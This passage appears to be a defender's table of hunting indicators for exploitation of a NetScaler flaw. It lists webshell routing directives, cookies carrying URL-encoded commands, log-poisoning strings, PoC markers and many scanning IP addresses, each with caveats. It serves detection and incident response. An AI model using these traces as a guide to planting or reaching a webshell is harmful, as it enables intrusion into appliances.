| Config directive | AliasMatch ^/logon/LogonPoint/custom/receiver\.min\.[0-9a-f]+\.css$ | Beazley Security Labs [49]; GreyNoise blog [53] | httpd.conf route variant to the webshell (GreyNoise, via Beazley) | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. | Public advisory, no TLP marking |
| Config directive | php_flag engine on (changed from off) plus a SetHandler block for the webshell file | Beazley Security Labs [49]; CERT-EU [27] | PHP enabled for the webshell in httpd.conf (GreyNoise, CERT-EU, via Beazley) | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. Compare /etc/httpd.conf with a clean appliance on the same build. | Public advisory, no TLP marking |
| HTTP cookie | CsrfToken + NSC_TASS | Beazley Security Labs [49]; IFIN [57] | Cookies used to access the .ctxs.receiver webshell (GreyNoise, via Beazley) | NetScaler uses both cookies legitimately. Suspicious only when NSC_TASS carries URL-encoded commands on requests to the webshell path. | Public advisory, no TLP marking |
| Log string | pitboss log lines containing IFS or b64decode | Beazley Security Labs [49] | Log-poisoning exploitation of CVE-2026-88771 (Beaumont, via Beazley); check ns.log, /var/log/messages and your SIEM | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. | Public advisory, no TLP marking |
| Log string | "missed too many heartbeats" or "unexpectedly died" in authentication log lines | Beazley Security Labs [49]; CERT-EU [27]; Arctic Wolf [36]; Sygnia [37] | Crafted login usernames imitating packet-engine messages (watchTowr, CERT-EU, via Beazley); ns.log | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. | Public advisory, no TLP marking |
| User-Agent | ns-88771-poc | Beazley Security Labs [49] | Public PoC/scanner User-Agent seen by Lupovis (via Beazley); Apache access logs | A public testing tool, not an actor indicator. Means someone tested the box. | Public advisory, no TLP marking |
| User-Agent | PoCbit | Poppelgaard [39] | Scanner User-Agent listed alongside ns-88771-poc in the Poppelgaard checker v1.11 log hunt (source of the value not stated there); Apache access logs | A testing-tool marker, not an actor indicator. A hit means someone ran a PoC or scanner against the box, possibly a researcher or defender. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/wtw888* | Poppelgaard [39]; watchTowr Detection Artefact Generator [29]; watchTowr Detection Artefact Generator [31] | Output marker glob from the Poppelgaard checker v1.11 for files written by exploit payloads and PoC tools (alongside /var/tmp/watchTowr*, /tmp/wtw*, /tmp/boom*, nx_verify.html, id009*) | Pattern from a public triage script, not a vendor report. The watchTowr tools document /var/tmp/watchTowr and /tmp/watchTowr as their example outputs; a wtw* hit means a PoC-class tool or payload ran on the box, and /tmp is in memory so it clears on reboot. | Public GitHub repository, no TLP marking |
| IPv4 | 78.128.113.10 | Poppelgaard [39] | Exploitation-attempt source per the GreyNoise-era list compiled from the public GreyNoise, Marius Sandbu and Lupovis releases (28-29 Sep), carried in the Poppelgaard checker. WHOIS: RACKWEB-NET, Miti 2000 EOOD. VirusTotal: 4 of 91 engines malicious, 3 suspicious (2 Oct) | Single compiled list; the checker does not state which source observed this specific IP, and no public source describes what it did. A hunting lead, not proof of targeting. | Public GitHub repository, no TLP marking |
| IPv4 | 158.94.209.12 | Poppelgaard [39] | Download server or sender per Gotham Technology Group, shared with permission and carried in the Poppelgaard checker. WHOIS: OMEGATECH, Omegatech LTD. VirusTotal: 12 of 91 engines malicious (2 Oct) | Gotham IR observation shared with permission, relayed via the checker. Attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. | Public GitHub repository, no TLP marking |
| IPv4 | 38.134.148.238 | Poppelgaard [39] | Tied to the 2 Oct activity, shared in the NetScaler community and carried in the Poppelgaard checker's GreyNoise-tagged probe group. WHOIS: Cogent Communications. VirusTotal: 2 of 91 engines malicious, 2 suspicious (3 Oct) | Community-shared via the checker; the checker itself groups it as scanner noise, and no public source describes what it did or links it to the campaign first-hand. A hunting lead, not a confirmed attacker address; not in this site's firewall blocklist. | Public GitHub repository, no TLP marking |
| IPv4 | 167.148.88.236 | Poppelgaard [39] | Tied to the 2 Oct activity, shared in the NetScaler community and carried in the Poppelgaard checker's GreyNoise-tagged probe group. WHOIS: RIPE allocation, netname NET-167-148-88-0-24 (Ultahost, New York per PTR range data). VirusTotal: 1 of 91 engines malicious, 1 suspicious (3 Oct) | Community-shared via the checker; the checker itself groups it as scanner noise, and no public source describes what it did or links it to the campaign first-hand. A hunting lead, not a confirmed attacker address; not in this site's firewall blocklist. | Public GitHub repository, no TLP marking |
| IPv4 | 5.188.206.226 | Poppelgaard [39] | Download server or sender per Gotham Technology Group, shared with permission and carried in the Poppelgaard checker. WHOIS: TAIL-NET, Technology Advanced Investment Limited. VirusTotal: 0 of 91 engines malicious, 1 suspicious (2 Oct) | Gotham IR observation shared with permission, relayed via the checker. Attacker IPs in IR writeups can be unique to one victim; absence is not proof of a clean host. Low VirusTotal score does not prove safety. | Public GitHub repository, no TLP marking |
| String | NX-CVE-OK | Beazley Security Labs [49] | Test-marker text dropped in web folders by exploitation checks (Lupovis, via Beazley); grep /netscaler/ns_gui | Means the box was reached and is exploitable, not necessarily backdoored. | Public advisory, no TLP marking |
| File permission | /bin/sh expected -r-xr-xr-x (setuid means modified) | Beazley Security Labs [49]; Google GTIG / Mandiant [34] | Check with ls -l /bin/sh before patching; the installer sets setuid (Beazley, GTIG) | Hunting lead compiled by Beazley Security Labs; not proof of compromise on its own. | Public advisory, no TLP marking |
| IPv4 | 172.247.44.85 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CNSERVERS LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 165.227.201.112 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 173.231.39.244 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WebNX, Inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 64.225.103.14 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, Germany) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 159.65.104.231 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 142.93.205.229 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (DigitalOcean, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 182.101.54.57 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 87.224.84.82 | GreyNoise tag [56]; LevelBlue SpiderLabs (THOR team) [42] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Spitfire Network Services Limited, United Kingdom). LevelBlue: source of a configuration-staging attempt | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 137.220.53.135 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, Canada) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 120.28.233.211 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Globe Telecoms, Philippines) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 149.28.58.71 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 23.234.111.22 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (tzulo, inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 198.13.159.233 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (BL Networks, Netherlands) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 85.221.203.85 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (INEA sp. z o.o., Poland) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 46.150.68.55 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Kyivski Telekomunikatsiyni Merezhi, Ukraine) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 159.26.103.184 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Proton AG, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 45.249.89.172 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (SpeedyPage Ltd, Japan) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 197.52.9.138 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (TE-AS, Egypt) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 180.242.113.168 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PT Telekomunikasi Indonesia, Indonesia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 85.117.117.248 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Mobile Telecom-Service LLP, Kazakhstan) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 73.43.85.7 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Comcast Cable Communications, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 88.180.103.22 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Free SAS, France) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 194.28.195.90 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Dialog-K LLC, Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 95.63.246.50 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Vodafone Espana S.A.U., Spain) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 31.13.192.160 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (SKAT POPOVO Ltd., Bulgaria) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 185.170.55.89 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (LLC Electron-Telecom, Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 104.203.50.26 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Blue Stream, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 37.19.221.171 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Datacamp Limited, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 45.143.167.96 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (BlueVPS OU, Netherlands) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 206.232.71.215 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Leaseweb Deutschland GmbH, Germany) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 130.94.106.141 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (LIGHT NODE LIMITED, Argentina) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 58.187.56.89 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (FPT Telecom Company, Vietnam) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 171.106.10.118 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 82.24.212.15 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Shock Hosting LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 178.66.43.241 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PJSC Rostelecom, Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 185.209.15.246 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (ESTOXY OU, Netherlands) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 94.190.77.195 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (INTERRA telecommunications group, Ltd., Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 93.177.60.233 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (PJSC Rostelecom, Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 68.46.140.222 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Comcast Cable Communications, LLC, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 178.218.40.232 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (ATEXS PLUS Ltd., Russia) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 49.36.107.103 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Reliance Jio Infocomm Limited, India) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 191.37.30.194 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WRNET LTDA, Brazil) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 23.234.74.48 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (tzulo, inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. VPN or proxy exit shared by many users; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 72.73.231.73 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Verizon Business, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 95.229.84.239 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Telecom Italia S.p.A., Italy) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 113.137.102.68 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.243.125.255 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.76.92.109 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 8.217.173.25 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 8.210.67.91 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.239.205.29 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.76.132.65 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 8.218.219.56 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.76.102.1 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 47.76.63.52 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 8.210.119.74 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Alibaba (US) Technology Co., Ltd., Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 64.177.93.71 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (The Constant Company, LLC, Mexico) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 44.252.255.141 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
